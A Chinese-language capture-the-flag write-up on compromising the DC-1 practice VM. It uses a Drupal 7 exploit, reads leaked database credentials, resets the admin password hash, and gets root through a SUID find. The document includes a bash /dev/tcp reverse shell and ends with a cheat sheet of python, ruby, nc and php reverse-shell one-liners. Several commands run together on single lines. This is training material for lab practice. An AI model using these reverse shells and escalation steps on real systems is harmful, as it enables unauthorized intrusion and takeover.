这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址:(http://www.five86.com/dc-1.html)
直接访问页面,根据经验应该为drupal的网站,从web入手,找该cms漏洞利用工具
同时上nmap进行端口扫描,查看开启的服务及是否有敏感信息文件
可知开放22、80、110端口,linux主机 网站CMS确定为Drupal版本号为7
meterpreter > sysinfo
Computer : DC-1
OS : Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
Meterpreter : php/linux
meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you
# 提示查看配置文件
find . -type f | xargs grep "password"
meterpreter > cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
注意
nc -lvp 2222
python -c "import pty;pty.spawn('/bin/bash')" # 获取一个交互shellbash -i >& /dev/tcp/172.16.0.10/2222 0>&1 # 反弹bash
mysql -udbuser -pR0ck3t
select * from users \G;
mysql> select * from users \G;
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: admin@example.com
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: admin@example.com
data: b:0;
php scripts/password-hash.sh 123456
php scripts/password-hash.sh 123456
password: 123456
hash: $S$DqoimnZKpzNbUFgNiiGexSM.Z29/UXOFtPunnZY0nSHhJBi3RdNP
www-data@DC-1:/var/www$
update users set pass='SDRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu' where uid=1;
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
find / -perm -u=s -type f 2>/dev/nullfind / -perm /4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
touch test # 创建一个空文件find test -exec 'whoami' \; #查看是否提权find test -exec '/bin/sh' \;#将root的bash反弹
-----------至此获得所有的flag!!!---------
python: python -c "import pty;pty.spawn('/bin/bash')"
ruby: ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
nc: nc -e /bin/bash ip port
php:<?php
$sock=fsockopen("ip",port);//自己的外网ip,端口任意
exec("/bin/sh -i <&3 >&3 2>&3");
?>
find test -exec '/bin/sh' \;
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh